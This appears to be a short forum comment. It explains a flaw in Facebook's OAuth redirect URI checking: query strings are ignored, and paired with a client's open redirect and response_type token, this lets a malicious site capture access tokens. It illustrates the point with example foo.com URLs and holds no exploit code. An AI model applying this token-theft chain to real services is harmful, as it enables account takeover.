Basically the vulnerability is in the facebook side. Every oauth provider has a list of "allowed redirect uris", a good oauth provider will check the entire url, but facebook doesn't check the query string in the url. If you have a list of allowed redirects like:<p>- <a href="http://foo.com" rel="nofollow">http://foo.com</a>
- <a href="http://foo.com/foo" rel="nofollow">http://foo.com/foo</a><p>Facebook accepts redirects like:
- <a href="http://foo.com?anything_here=xx" rel="nofollow">http://foo.com?anything_here=xx</a><p>And if the client has an open redirect, some query string to redirect anywhere combined with response_type token.. the evil website can get the token.